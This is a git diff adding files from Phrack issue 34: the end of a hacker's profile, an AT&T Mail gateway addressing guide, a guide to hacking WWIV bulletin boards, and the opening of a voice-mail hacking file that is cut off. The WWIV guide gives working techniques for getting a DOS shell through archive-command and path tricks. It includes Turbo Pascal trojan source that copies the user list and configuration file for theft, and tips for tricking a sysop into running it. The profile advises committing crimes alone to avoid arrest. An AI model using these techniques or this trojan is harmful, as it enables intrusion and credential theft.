+hardware.  Well, depending on the hardware. (ha-ha!)
+
+     "Cracking" Apple software was of course the next logical step.  The 6502
+was a wonderful chip, and easy to learn.  Copy-cards and other "hacked"
+hardware was becoming findable and it was getting to the point that the
+only goal was to get your hands on pre-release software.  Before I had entered
+the "modem" world, friends had a network of other people across the country and
+traded things by mail.
+
+     Of course the whole world changed when I picked up a 300 baud modem.
+Suddenly there was the communication and knowledge that I had been hungry for.
+People wrote text files on just about everything imaginable.  What is the
+president's phone number?  How can I call the pope?  How can I make lowercase
+on my Apple II?  What are the routing numbers for boxing to the Eastern Bloc
+countries?
+
+     Codes were never much of an interest.  The systems that ran them, however,
+were quite interesting.  As technology advanced, SCCs started  using
+sophisticated AI techniques to detect any kind of abnormal usage instantly.
+Codes used to last several months, now they only lasted a few hours.  Boxing,
+however, was a little more elegant and was the flashy way to call your friends.
+
+     Even before I had ever heard of boxing or phreaking, I enjoyed the
+benefits of what we now know as a "red box".  While in boarding school, I
+noticed that a somewhat broken phone emitted obscenely loud "beeps" when you
+dropped in a quarter.  I took a little micro-recorder and recorded myself
+dropping about $5.00 into the phone.  When I played this back into the
+telephone, the telco thought I was actually dropping change in the machine!  I
+was able to call my girlfriend or whomever and speak for hours.  Now most
+payphones mute those tones so they are barely audible, if at all.
+
+     Local user groups were a good place to pick up software, legal and
+otherwise.  Remember those damn "CLOAD" magazine tapes for the TRS-80? 80-Micro
+magazine?  The early 80's was the time of the hardware hacker - anything
+bizarre you wanted you had to make yourself, since it wasn't available
+otherwise.  Now you can call any of a slew of 800 numbers, give them your
+credit card number (!) and have it on your doorstep the next day.
+
+     I think part of the problem of the "new generation" of hackers, phreakers,
+warez kids, etc, is that they never had the experience with low-level stuff and
+actually having to into the hardware to get what they wanted.  Their only
+programming experience is coming from school, which gives a shallow and usually
+totally impractical background for the "real world".
+
+     My eventual disgust with the pirate world came when products such as
+"Pirate's Friend" came out, allowing people to sector edit out my name and
+insert theirs.  I had spent quite a lot of time trying to find new software,
+and enjoyed the ego stroke of having my name passed around. I had a lot of
+respect for book authors that were plagiarized after that...
+
+About the industry
+~~~~~~~~~~~~~~~~~
+
+     The computer industry in general is interesting.  Working in it, I hope
+I'm justified to speak about it.  Getting  a job is quite easy, since the
+technology is changing so much, unless it is in something that will be around
+for some time, you can usually pick up a job by just knowing the latest
+developments, the buzzwords, and having good "chemistry".  In the valley many
+firms realize that colleges don't really teach you much in the way of practical
+knowledge.  At best, they give you the opportunity to try different types of
+machines.  It amazes me that HR departments in companies across the country
+won't even look at a resume unless the applicant has a college degree.
+Advanced degrees are a different matter and are usually quite applicable
+towards research, but your usual BA/BS variety?  Nah.  If you want to make a
+lot of money in this industry, all you need to do is get the reputation as a
+person who "gets things done" and have superior communication skills.  You can
+write your ticket after that.
+
+About legal issues
+~~~~~~~~~~~~~~~~~
+
+     Anyone who has ever read some of my later text files (1986, 1987) knows
+that I had no qualms about the legalities of beating an establishment.
+Although my line of morals was probably beyond where others placed theirs, I
+could always justify to myself damage or loss to an establishment, "beating the
+system", rather than hurting the individual.  Although I am pretty right-winged
+in beliefs, I have a great distrust for the policing agencies.
+
+Various memories
+~~~~~~~~~~~~~~~
+
+     Getting a call from my father while at school and being told that Control
+C had called him and relayed the message "Tell Doug the FBI are after The Disk
+Jockey.  Get rid of everything and hide."  To say I "cleaned house" would have
+been a gross understatement.  I knew this was true, I, like many others, had
+just ridden on the false pretense that they would have better things to do then
+come after me.  I later saw intelligence reports showing that I had been kept
+track of for some time.  I was described as:
+
+"Involved in some type of student-loan scam through creating fictitious college
+applicants at his school.  Very violent temper, ruthless attitude.  Breaks
+people's legs for money (TX).  Owns a motorcycle and a european sedan.  Nasty
+hacker."
+
+     Only a handful of people would know that I had a motorcycle, so it was
+somewhat upsetting that they had this kind of information on me.  I later saw
+some of this same information in Michigan Bell Security's records.  They also
+had the correct phone number for my place at Cornell, my parents number, and
+even the number of some of my personal non-computer related friends.
+
+     SummerCon in 1987 was a fun experience.  I had the opportunity to meet
+many of the people that I communicated with regularly, as well as wonder why
+people thought St. Louis was such a wonderful place.  While there were a few
+socially "on-the-fringe" types, I was amazed that most of the other "hackers"
+didn't fit the usual stereotypes.  They were just regular guys that had a some
+above average cleverness that allowed them to see the things that others
+couldn't.
+
+     By the time I was 20 years old, I had about $40,000 worth of credit on
+plastic, as well as a $10,000 line of credit for "signature loans" at a local
+bank.  The credit system was something that seemed fun to exploit, and it
+doesn't take long to figure out how the "system" works.  With that kind of cash
+Aavailable, however, it's tempting to go and buy something outrageous and do
+things that you wouldn't normally do if you had the cash.  This country is
+really starting to revolve around credit, and it will be very hard to survive
+if you don't have some form of it.  If more people were aware of how the credit
+systems worked, they might be able to present themselves in a better light to
+future creditors.  I don't think that credit is a difficult thing to
+understand, I just had an unusual interest in understanding and defeating it.
+Perhaps this is something that my future text files should be about.
+
+Getting busted
+~~~~~~~~~~~~~
+
+     On June 27, 1988 at 1:47am, I had just parked my car outside my apartment
+and was walking up to the door when I heard someone say "Doug?"  I knew that no
+friend of mine would be visiting at that hour, so I knew my fate before I
+turned around.  An FBI agent, State police detective and a local detective were
+walking up to me.  "We have a warrant for your arrest." Interestingly, they had
+actually several warrants, since they weren't sure what my name was.  I was
+being arrested for 6 counts of "conspiracy to commit fraud".  After being
+searched to make sure I wasn't carrying a gun, they asked if they could "go
+into my apartment and talk about things".  Although I had completely "cleaned
+house" and had nothing to hide in there, I wasn't about to help out an
+investigation on me.  "Ah, I think I had better contact an attorney first."
+"Is there one you can call right now?"  "Are you kidding?  It's 2:00am!"
+
+     I was handcuffed and had my legs strapped together with a belt and was
+thrown in the back of a car.  This was one of those usual government cars that
+you see in the movies with the blackwalls and usual hubcaps.  Interestingly
+enough, the armrest of the car hid quite an array of radio equipment.  Although
+pretty freaked out, I figured the best thing to do at that point was try to get
+some sleep and call the best attorney money could by in the morning.
+
+     Little did I know where I was being brought.  I was driven all the way to
+a small Indiana town (population 5,000) where a 16 year-old Wheatfield Indiana
+boy had made the statement that he and I "agreed to devise a scam".  Although
+nothing was ever done, merely planning it created the conspiracy charge.
+
+     I figured that after my arraignment I could post bail and find an
+attorney.  I had almost $10k in the bank and could probably find more if I
+needed it.  I was sadly mistaken.  The next day at my arraignment the charges
+were read and bail was set -- $150,000.00, cash only!
+
+     In a strange turn of events, the FBI decided to totally drop the case
+against me.  The federal prosecutor figured it wasn't worth wasting his time
+and they jumped out.  However, the Indiana state police were involved in my
+arrest and were angry that the FBI was dropping the case after they had
+invested so much time and money in the case, so they decided to pursue the case
+themselves.  There is so much friction between the FBI and state police, that
+the FBI didn't even answer their letters when they tried to request information
+and data files on me.
+
+     Funny.  I spent 6 months in a tiny county jail, missing the start and
+first semester of school.  I was interrogated constantly.  I never told on a
+sole and never made a statement about myself.  I sat in jail daily, reading
+books and waiting for my court dates.  Although I never expected it, nobody
+ever thanks you when you keep your mouth shut.  I can't imagine that many
+people would sit in jail for a long time in order to save their friends.
+Perhaps it's a personal thing, but I always thought that although I doubt
+someone else would do it for me, I would never, ever tell anything on anyone
+else.  I would never be responsible for someone else's demise.  It took a lot
+of money, and a lot of friday nights of frustration, but I walked away from
+that incident without ever making a statement.  It was at a time when my
+"roots" were deepest and I probably could have really turned in a lot of other
+people for my benefit, but it was at a time in my life where I could afford to
+miss some school and the integrity was more important to me.  There were a lot
+of decisions that had to be made, and spending time in jail is nothing to be
+proud of, but I never backed down or gave in.  It did provide the time for me
+to really re-evaluate who and what I was, and where I was going.
+
+People I've known
+~~~~~~~~~~~~~~~~
+
+Compaq            Personal friend for some time now.
+Control C         Mostly likely the craziest guy I've ever met.
+                  Really nice guy.
+Knight Lightning  Would call me up in the middle of the night and
+                  want to discuss philosophical and social issues.
+                  Kind of guy I would probably get along with outside
+                  of computers as well.
+Loki              Friend since high school.  Made a big splash in the
+                  h/p world, then disappeared from it.  He and I (and
+                  Control C) drove to SummerCon together.
+Shooting Shark    Great guy who used to be into calling bridges
+                  and would yell "Hey, I'm paying for this!"  Truly
+                  one of the only people that I ever knew that didn't
+                  do anything blatantly illegal.  Most of our email
+                  was over the optimization of crypt.  The Mad Alchemist
+                  Sysop of Lunatic Labs, one of the only boards that
+                  I feel is worth the telephone call anymore.
+                  He has given me a lot of slack and runs
+                  a BBS that picks up some of the most obscure
+                  information.  A sysop that others should be judged
+                  by.
+Tom Brokaw        Personal friend since childhood that stood by me
+                  through thick and thin, bailing me out of trouble
+                  time and time again.  I can never thank him enough
+                  for being a true friend.
+
+BBSs
+~~~
+More than I could mention here.  A few more recent notables --
+
+Atlantis          Although run on an Apple, the Lineman had this
+                  system so slick and customized that it became the
+                  standard that a lot of the PC based boards were
+                  created with.  It was the first real
+                  "clearinghouse" for text files.
+Free World II     Run by Major Havoc and myself, this was an
+                  incredibly robust system, and was one of the first
+                  to be run on a US Robotics HST. Although it was
+                  primarily a discussion board, the file areas
+                  offered some of the best files -- virtually no
+                  games, but about every real utility and the like.
+
+Metal AE          201-879-6668 - this was a true blue AE line that
+                  was around for like 5 or 6 years and was ALWAYS busy.
+                  Had all of the original cDc and other bizarre text
+                  files, occasionally some new Apple warez.
+
+Lunatic Labs      Still up and still great.
+
+Metal Shop Private    Perhaps one of the best boards of all time.
+                      Run by Taran King and had a healthy, yet
+                      secure userlog.  It was a closed system, the
+                      only way to get on was to know somebody.
+                      Everyone on the system knew each other in
+                      some sense.
+
+World of Cryton   One of the first boards to have a "philter" and to
+                  really push the messages as far as codes, accounts,
+                  card numbers, etc.  This was also the demise, along
+                  with many of the 414 hackers.
+
+Misc
+~~~
+
+2600 Magazine     How could I not like a magazine that published
+                  articles I wrote?  This really is a great magazine
+                  and anyone who is interested in computers, privacy,
+                  or cyber-issues in general should subscribe.
+
+Fame...?          Was in the movie "Hoosiers"  (thanks for bringing
+                  that up, Shark!), even though I'm not a basketball
+                  fan.  Met Dennis Hopper, etc. Went to school with
+                  a lot of famous people's kids.  Most have some
+                  pretty serious problems.  Be glad you are who you
+                  are.
+
+Marriage...?      I'm single and will do everything I can to stay
+                  that way.  When people ask me about getting married
+                  I tell them that the idea of car payments scare me.
+                  I enjoy having girlfriends, but I've become too
+                  independent.  I still run around at bars until
+                  sometimes 3:00am or so, but still manage to spend
+                  about 50 or 60 hours a week at work.  Even if I cut
+                  out the bar scene, I wouldn't have much time to
+                  spend with someone else on a daily basis.
+
+Advice            If you ever get into doing illegal things, make
+                  sure you do them by yourself.  Your chances of
+                  getting caught when you do things solo and resist
+                  the temptation to "brag" about them is minimal.
+                  When someone else knows about what you have done,
+                  it doesn't matter how good of a friend they are.
+                  If they get into trouble, you are going to the
+                  sacrificial lamb when it comes to negotiating their
+                  freedom.  Even the strongest willed individuals
+                  seem to crumble when questioned by police.
+                  Groups are bad news.  There are very little
+                  advantages to being in a group and all it does is
+                  increase your personal risk by multitudes.
+                  Cracking groups aren't nearly as dangerous, but
+                  they DO bring boards down.  Look to the fate of
+                  groups such as LOD for examples of group fate.  Lex
+                  Luthor, perhaps one of the most elusive and private
+                  hackers of all time was the one to bring down the
+                  rest of the group.  This was tough for me, as many
+                  of the members were people I talked with and could
+                  really feel for.
+
+                  Don't get discouraged in life if you feel that you
+                  are behind the rest because you don't come from a
+                  rich family or have the best equipment.  I left
+                  home when I was 17 years old, keeping only minimal
+                  contact with my parents since then and lived life
+                  pretty well, using my abilities to "smooth talk"
+                  and pure enthusiasm to walk into about any job.
+                  Don't put people down -- everyone has something to
+                  teach you, even the bum on the street might be able
+                  to tell you how to make some free phone calls!
+                  There is a wealth of information to be found via
+                  Usenet, text files, or even your school or public
+                  library.  Stay informed and well read.
+
+Email             I always enjoy hearing from people.  Reach me via
+                  the Internet at douglas@netcom.com, or on Lunatic
+                  Labs BBS.
+
+________________________________________________________________________________
diff --git a/phrack34/4.txt b/phrack34/4.txt
new file mode 100644
index 0000000..d6453fc
--- /dev/null
+++ b/phrack34/4.txt
@@ -0,0 +1,116 @@
+                                ==Phrack Inc.==
+                Volume Three, Issue Thirty-four, File #4 of 11
+                            _______________________
+                          ||                       ||
+                          || The AT&T Mail Gateway ||
+                          ||                       ||
+                          ||   December 19, 1990   ||
+                          ||                       ||
+                          ||    by Robert Alien    ||
+                          ||_______________________||
+
+The Internet Gateway
+~~~~~~~~~~~~~~~~~~~
+The Internet Gateway provides Internet e-mail users with a method of
+communication to AT&T Mail.  The Interconnect consists of various private
+email networks and uses an addressing format better know as Domain Addressing
+Service (DAS).
+
+A domain address consists of a user name, followed by an @ sign and/or % sign
+and a domain name, which is usually the system name.
+
+Example:
+
+        jdoe@attmail.com
+
+Sending Email to Internet Users
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+To send email from the AT&T MailService to the Internet community use the UUCP
+addressing style.
+
+Example:
+
+        internet!system.domain!username
+
+Translates to:
+
+        internet!gnu.ai.mit.edu!jdoe
+
+If you are sending e-mail to an Internet user whose e-mail address may be in
+the RFC 822 format (user@domain), you must translate the RFC address before
+sending your message to an Internet recipient.
+
+        username@system.domain (Internet user's address)
+
+        internet!system.domain!username (to a UUCP address)
+
+Example:
+        username%system2@system.domain (Internet user's address)
+
+Translates to:
+        internet!system.domain!system2!username
+
+Sending Email From The Internet
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+To send email to the AT&T Mail Service, Internet users can choose either the
+RFC 822 or UUCP addressing style.  The Internet recognizes attmail.com as the
+domain identifier for AT&T Mail when electronic messages are sent through the
+gateway.  Although many Internet users choose to send e-mail using the RFC 822
+addressing style, the UUCP style is also available on many UNIX systems on the
+Internet, but not every system supports UUCP.  Below are examples of both
+addressing styles:
+
+RFC 822 Addressing: username@attmail.com
+
+Example:
+
+        jsmith@attmail.com
+
+UUCP Addressing: attmail.com!username
+
+Example:
+
+        attmail.com!jdoe
+
+Although email can be sent through the Internet gateway, surcharged services,
+such as Telex, FAX, COD, U.S. Mail, overnight, urgent mail and messages
+destined to other ADMDs connected to AT&T Mail are not deliverable.  If you are
+an Internet e-mail user attempting to use a surcharged service and are not
+registered on AT&T Mail, you will not be able to send your message, and will be
+automatically notified.  Below is a list of surcharged services that are
+unavailable to Internet users.
+
+*  FAX
+*  Telex
+*  COD
+*  U.S. Mail
+*  Overnight
+*  Administrative Management Domain (ADMD) Messages
+
+Sending Email to Bitnet Users
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+To send email to BITNET users from AT&T Mail, enter:
+
+        internet!host.bitnet!user
+
+Sending Email to UUNET Users
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+To send email to UUNET users from AT&T Mail via the Internet Gateway, enter:
+
+        attmail!internet!uunet!system!user
+
+Internet Restrictions
+~~~~~~~~~~~~~~~~~~~~
+The following commercial restrictions apply to the use of the Internet Gateway.
+
+*  Users are prohibited to use the Internet to carry traffic between commercial
+   (for profit) electronic messaging systems.
+
+*  Advertising and soliciting i.e., messages offering goods or services for sale
+   or offers of jobs.
+
+*  Provision of for-profit service, other than electronic messaging to Internet
+   users, is permitted (e.g., database services) if such service is used for
+   scholarly research purposes and its costs are borne by individual or
+   institutional subscription.
+_______________________________________________________________________________
diff --git a/phrack34/5.txt b/phrack34/5.txt
new file mode 100644
index 0000000..e6475c6
--- /dev/null
+++ b/phrack34/5.txt
@@ -0,0 +1,411 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-four, File #5 of 11
+
+                          ***                    ***
+                          ***                    ***
+                          *** The Complete Guide ***
+                          ***  to Hacking WWIV   ***
+                          ***                    ***
+                          ***     by Inhuman     ***
+                          ***   September 1991   ***
+                          ***                    ***
+                          ***                    ***
+
+     WWIV is one of the most popular BBS programs in the country.  With
+thousands of boards in WWIVnet and hundreds in the spinoff WWIVlink, there is a
+lot of support and community.  The nice thing about WWIV is that it is very
+easy to set up.  This makes it popular among the younger crowd of sysops who
+can't comprehend the complexities of fossil drivers and batch files.  In this
+file, I will discuss four methods of hacking WWIV to achieve sysop access and
+steal the user and configuration files.  Just remember the number one rule
+of hacking: Don't destroy, alter, or create files on someone else's computer,
+unless it's to cover your own trail.  Believe me, there is nothing lower than
+the scum who hack BBSes for the sheer pleasure of formatting someone else's
+hard drive.  But there is nothing wrong (except legally) with hacking a system
+to look at the sysop's files, get phone numbers, accounts, etc.  Good luck.
+
+***
+*** Technique #1: The Wildcard Upload
+***
+
+     This technique will only work on a board running an unregistered
+old version of DSZ and a version of WWIV previous to v4.12.  It is all
+based on the fact that if you do a wildcard upload (*.*), whatever file you
+upload will go into the same directory as DSZ.COM, which is often the main BBS
+directory.  So there are several methods of hacking using this technique.
+
+     If the sysop is running an unmodified version of WWIV, you can simply
+compile a modded version of it with a backdoor and overwrite his copy.  Your
+new copy will not be loaded into memory until the BBS either shrinks out (by
+running an onliner or something), or the sysop terminates the BBS and runs it
+again.
+
+     You can also have some fun with two strings that WWIV always recognizes at
+the NN: prompt: "!@-NETWORK-@!" and "!@-REMOTE-@!".  The first is used by
+WWIVnet to tell the BBS that it is receiving a net call.  If the BBS is part of
+a network and you type "!@-NETWORK-@!", it will then wait for the network
+password and other data.  If the board is not part of a network, it will just
+act like you typed an invalid user name.  The second string is reserved for
+whatever programs people wanted to write for WWIV, like an off-line reader or
+whatever.  Snarf (the file leeching utility) uses this.  If there is not a
+REMOTE.EXE or REMOTE.COM in the main BBS directory, it will also act as if you
+entered an invalid user name.  So, what you can do is wildcard upload either
+REMOTE.COM or NETWORK.COM.  You want to call them COM files, because if the EXE
+files already exist, the COM ones will be called first.  If the BBS is part of
+a network, you should go for REMOTE.COM, because if you do NETWORK.COM, it will
+screw up network communications and the sysop will notice a lot faster.  Of
+course, if you're going straight in for the kill, it doesn't matter.
+
+     So, what should NETWORK.COM or REMOTE.COM actually be? you ask.  Well, you
+can try renaming COMMAND.COM to one of those two, which would make a DOS shell
+for you when it was executed.  This is tricky, though, because you need to know
+his DOS version.  I suggest a batch file, compiled to a COM file using PC Mag's
+BAT2EXEC.  You can make the batch file have one line:
+
+\COMMAND
+
+     That way you don't have to worry about DOS versions.
+
+     Remember that this method of hacking WWIV is almost completely obsolete.
+It is just included for reference, or for some old board run from an empty
+house where the sysop logs on twice a year or something.
+
+***
+*** Technique #2: The PKZIP Archive Hack
+***
+
+     Probably the most vulnerable part of WWIV is the archive section.  This
+section allows users to unZIP files to a temporary directory and ZIP the files
+you want into a temporary ZIP file, then download it.  This is useful if you
+download a file from another board, but one file in it is corrupted.  This way
+you don't have to re-download the whole file.  Anyway, on with the show.  Make
+a zip file that contains a file called PKZIP.BAT or COM or EXE.  It doesn't
+matter.  This file will be executed, so make it whatever you want, just like in
+Technique #1.  Make it COMMAND.COM, or a batch file, or a HD destroyer,
+whatever you want.  So you upload this file, and then type "E" to extract it.
+
+It'll ask you what file to extract and you say the name of the file you just
+uploaded.  It'll then say "Extract What? " and you say "*.*".  It'll then unzip
+everything (your one file) into the TEMP directory.  Then go to the archive
+menu ("G") and pick "A" to add a file to archive.  It'll ask what file you want
+to add, and say anything, it doesn't matter.  At this point it will try to
+execute the command:
+
+PKZIP TEMP.ZIP \TEMP\%1
+
+     Where %1 is what you just entered.  The file pointer is already pointing
+to the temp directory, so instead of executing PKZIP from the DOS path, it'll
+execute the file sitting in the current directory, TEMP.  So then it runs PKZIP
+and you get your DOS shell or whatever.
+     If PKZIP does not work, you may want to try uploading another file, and
+use the same technique, but instead make it an ARC file and call the file in
+the archive PKPAK.
+
+     This technique is relatively easy to defeat from the sysop's end, but
+often they are too lazy, or just haven't heard about it.
+
+***
+*** Technique #3: The -D Archive Hack
+***
+
+     This technique also plays on the openness of WWIV's archive system.  This
+is another method of getting a file into the root BBS directory, or anywhere on
+the hard drive, for that matter.
+
+     First, create a temporary directory on your hard drive.  It doesn't matter
+what it's called.  We'll call it TEMP.  Then, make a sub-directory of TEMP
+called AA. It can actually be called any two-character combination, but we'll
+keep it nice and simple.  Then make a subdirectory of AA called WWIV.
+
+     Place NETWORK.COM or REMOTE.COM or whatever in the directory
+\TEMP\AA\WWIV.  Then from the TEMP directory execute the command:
+
+PKZIP -r -P STUFF.ZIP         <--- The case of "r" and "P" are important.
+
+     This will create a zip file of all the contents of the directories, but
+with all of the directory names recursed and stored.  So if you do a PKZIP -V
+to list the files you should see AA\WWIV\REMOTE.COM, etc.
+
+     Next, load STUFF.ZIP into a hex editor, like Norton Utilities, and search
+for "AA".  When you find it (it should occur twice), change it to "C:".  It is
+probably a good idea to do this twice, once with the subdirectory called WWIV,
+and another with it called BBS, since those are the two most common main BBS
+directory names for WWIV.  You may even want to try D: or E: in addition to C:.
+You could even work backwards, by forgetting the WWIV subdirectory, and just
+making it AA\REMOTE.COM, and changing the "AA" to "..".  This would be
+foolproof.  You could work from there, doing "..\..\DOS\PKZIP.COM" or whatever.
+
+     Then upload STUFF.ZIP (or whatever you want to call it) to the BBS, and
+type "E" to extract it to a temporary directory.  It'll ask you what file.
+Type "STUFF.ZIP".  It'll ask what you want to extract.  Type """-D".  It'll
+then execute:
+
+PKUNZIP STUFF.ZIP ""-D
+
+     It will unzip everything into the proper directory.  Voila.  The quotation
+marks are ignored by PKUNZIP and are only there to trip up WWIV v4.20's check
+for the hyphen.  This method can only be defeated by modifying the source code,
+or taking out the calls to any PKZIP or PKUNZIP programs in INIT, but then you
+lose your archive section.
+
+
+
+***
+*** Technique #4: The Trojan Horse File-Stealer
+***
+
+     This method, if executed properly, is almost impossible to defeat, and
+will conceivably work on any BBS program, if you know the directory structure
+well enough.  Once again, you need PC Mag's BAT2EXEC, or enough programming
+experience to write a program that will copy files from one place to another.
+     The basic principle is this: You get the sysop to run a program that you
+upload.  This program copies \WWIV\DATA\USER.LST and \WWIV\CONFIG.DAT *over*
+files that already exist in the transfer or gfiles area.  You then go download
+those files and you have the two most important files that exist for WWIV.
+Now, you need to do a certain amount of guess-work here.  WWIV has it's
+directories set up like this:
+
+
+
+       --- TEMP
+      I              --- DIR1
+      I             I
+      I--- DLOADS---I--- DIR2
+      I             I
+      I              --- DIR3
+WWIV--I--- DATA
+      I              --- GDIR1
+      I             I
+      I--- GFILES---I--- GDIR2
+      I             I
+      I              --- GDIR3
+       --- MSGS
+
+
+     The sysop sets the names for the DIR1, DIR2, etc.  Often you have names
+like UPLOADS, GAMES, UTILS, etc.  For the gfile dirs you might have GENERAL,
+HUMOR, whatever.
+
+     So you have to make a guess at the sysop's directory names.  Let's say he
+never moves his files from the upload directory.  Then do a directory list from
+the transfer menu and pick two files that you don't think anyone will download.
+Let's say you see:
+
+RABBIT  .ZIP 164k : The History of Rabbits from Europe to the U.S.
+SCD     .COM  12k : SuperCD - changes dirs 3% faster than DOS's CD!
+
+     So you then might write a batch file like this:
+
+@ECHO OFF
+COPY \WWIV\DATA\USER.LST \WWIV\DLOADS\UPLOADS\RABBIT.ZIP
+COPY \BBS\DATA\USER.LST \BBS\DLOADS\UPLOADS\RABBIT.ZIP
+COPY \WWIV\CONFIG.DAT \WWIV\DLOADS\UPLOADS\SCD.COM
+COPY \BBS\CONFIG.DAT \BBS\DLOADS\UPLOADS\SCD.COM
+
+     You'd then compile it to a COM file and upload it to the sysop directory.
+Obviously this file is going to be pretty small, so you have to make up
+plausible use for it.  You could say it's an ANSI screen for your private BBS,
+and the sysop is invited.  This is good if you have a fake account as the
+president of some big cracking group.  You wouldn't believe how gullible some
+sysops are.  At any rate, use your imagination to get him to run the file.  And
+make it sound like he shouldn't distribute it, so he won't put it in some
+public access directory.
+
+     There is a problem with simply using a batch file.  The output will look
+like:
+
+1 file(s) copied.
+File not found.
+1 file(s) copied.
+File not found.
+
+     That might get him curious enough to look at it with a hex editor, which
+would probably blow everything.  That's why it's better to write a program in
+your favorite language to do this.  Here is a program that searches specified
+drives and directories for CONFIG.DAT and USER.LST and copies them over the
+files of your choice.  It was written in Turbo Pascal v5.5:
+
+Program CopyThisOverThat;
+
+{ Change the dir names to whatever you want.  If you change the number of
+  locations it checks, be sure to change the "num" constants as well  }
+
+uses dos;
+
+const
+   NumMainDirs = 5;
+   MainDirs: array[1..NumMainDirs] of string[8] = ('BBS','WWIV','WORLD',
+      'BOARD','WAR');
+   NumGfDirs = 3;
+   GFDirs: array[1..NumGFDirs] of string[8] = ('DLOADS','FILES','UPLOADS');
+   NumSubGFDirs = 2;
+   SubGFDirs: array[1..NumSubGFDirs] of string[8] = ('UPLOADS','MISC');
+
+   NumDirsToTest = 3;
+   DirsToTest: array[1..NumDirsToTest] of string[3] = ('C:\','D:\','E:\');
+   {ok to test for one that doesn't exist}
+
+   {Source file names include paths from the MAIN BBS subdir (e.g. "BBS")  }
+
+   SourceFileNames: array[1..2] of string[25] = ('DATA\USER.LST','DATA\CONFIG.DA
+T');
+
+   { Dest file names are from subgfdirs }
+
+   DestFileNames: array[1..2] of string[12] = ('\BDAY.MOD','\TVK.ZIP');
+
+var
+   p, q, r, x, y, dirN: byte;
+   bigs: word;
+   CurDir, BackDir: string[80];
+   f1, f2: file;
+   Info: pointer;
+   ok: boolean;
+
+Procedure Sorry;
+
+var
+   x, y: integer;
+begin
+for y := 1 to 1000 do
+   for x := 1 to 100 do
+      ;
+Writeln;
+Writeln ('<THIS IS DISPLAYED WHEN FINISHED>');  {change to something like }
+Writeln;                                        {Abnormal program termination}
+ChDir(BackDir);
+Halt;
+end;
+
+begin
+
+Write ('<THIS IS DISPLAYED WHILE SEARCHING>'); {change to something like }
+
+{$I-}                                          {Loading...}
+
+GetDir (0, BackDir);
+ChDir('\');
+for dirn := 1 to NumDirsToTest do
+   begin
+   ChDir(DirsToTest[dirn]);
+   if IOResult = 0 then
+      begin
+      for p := 1 to NumMainDirs do
+         begin
+         ChDir (MainDirs[p]);
+         if (IOResult <> 0) then
+            begin
+            if (p = NumMainDirs) and (dirn = NumDirsToTest) then
+               Sorry;
+            end else begin
+            p := NumMainDirs;
+            for q := 1 to NumGFDirs do
+               begin
+               ChDir (GFDirs[q]);
+               if (IOResult <> 0) then
+                  begin
+                  if (q = NumGFDirs) and (dirn=NumdirsToTest) then
+                     Sorry;
+                  end else begin
+                  q := NumGFDirs;
+                  for r := 1 to NumSubGFDirs do
+                     begin
+                     ChDir (SubGFDirs[r]);
+                     if (IOResult <> 0) then
+                        begin
+                        if r = NumSubGFDirs then
+                           Sorry;
+                        end else begin
+                        r := NumSubGFDirs;
+                        dirn := NumDirsToTest;
+                        ok := true;
+                        end;
+                     end;
+                  end;
+               end;
+            end;
+         end;
+      end;
+   end;
+GetDir (0, CurDir);
+ChDir ('..');
+ChDir ('..');
+for x := 1 to 2 do
+   begin
+   Assign (f1, SourceFileNames[x]);
+   Assign (f2, CurDir+DestFileNames[x]);
+   Reset (f1, 1);
+   if IOResult <> 0 then
+      begin
+      if x = 2 then
+         Sorry;
+      end else begin
+      ReWrite (f2, 1);
+      Bigs := FileSize(f1);
+      GetMem(Info, Bigs);
+      BlockRead(f1, Info^, Bigs);
+      BlockWrite (f2, Info^, Bigs);
+      FreeMem(Info, Bigs);
+      end;
+   end;
+Sorry;
+end.
+
+     So hopefully the sysop runs this program and emails you with something
+like "Hey it didn't work bozo!".  Or you could make it work.  You could
+actually stick a BBS ad in the program or whatever.  It's up to you.  At any
+rate, now you go download those files that it copied the USER.LST and
+CONFIG.DAT over.  You can type out the CONFIG.DAT and the first word you see in
+all caps is the system password.  There are several utilities for WWIV that let
+you compile the USER.LST to a text file.  You can find something like that on a
+big WWIV board, or you can try to figure it out with a text or hex editor.  At
+any rate, once you have those two files, you're in good shape.
+
+     You could also use a batch file like that in place of one that calls
+COMMAND.COM for something like REMOTE.COM.  It's up to you.
+
+***
+*** Hacking Prevention
+***
+
+     So you are the sysop of a WWIV board, and are reading this file with
+growing dismay.  Have no fear, if you have patience, almost all of these
+methods can be fixed.
+
+     To eliminate the wildcard upload, all you have to do it get a current copy
+of WWIV (4.20), and the latest version of DSZ.  It's all been fixed.  To fix
+the PKZIP archive hack, simply specify a path in INIT in all calls to PKZIP,
+PKUNZIP, PKPAK, PKUNPAK, and any other archive programs you have.  So your
+command lines should look like:
+
+\DOS\PKZIP -V %1
+
+     Or something similar.  That will fix that nicely.  To eliminate the -D
+method, you have to make some modifications to the source code if you want to
+keep your archive section.  Goose, sysop of the Twilight Zone BBS in VA,
+puts out a NOHACK mod, which is updated regularly.  It fixes ALL of these
+methods except the last.  The latest version of NOHACK is v2.4.  If you are a
+WWIV sysop, put it in.
+
+     I can think of two ways to stop the last method, but neither of them are
+easy, and both require source code modifications.  You could keep track of the
+filesize of a file when it's uploaded.  Then when someone goes to download it,
+you could check the actual filesize with the size when it was uploaded.  If
+they differ, it wouldn't let you download it.  You could do the same with the
+date.  Although either method could be gotten around with enough patience.
+
+     For a virtually unhackable system, voice validate all users, have all
+uploads go to the sysop directory so you can look over them first, and don't
+run any programs.  Of course, this is very tedious, but that is the price
+of a secure BBS.
+
+***
+*** Thanks
+***
+
+     Thanks to Fenris Wolf for teaching me about the -D method, to Steve
+for help with the CopyThisOverThat program, and to Insight for proofing this
+file.
+
+*******************************************************************************
diff --git a/phrack34/6.txt b/phrack34/6.txt
new file mode 100644
index 0000000..4632e4d
--- /dev/null
+++ b/phrack34/6.txt
@@ -0,0 +1,322 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-four, File #6 of 11
+
+
+                           HACKING VOICE MAIL SYSTEMS
+
+                               by  Night Ranger
+
+
+DISCLAIMER
+
+I, Night Ranger, or anyone else associated with Phrack, am not responsible
+for anything the readers of this text may do.  This file is for informational
+and educational purposes only and should not be used on any system or network
+without written permission of the authorized persons in charge.
+
+
+INTRODUCTION
+
+I decided to write this text file because I received numerous requests for
+vmbs from people.  Vmbs are quite easy to hack, but if one doesn't know where
+to start it can be hard.  Since there aren't any decent text files on this
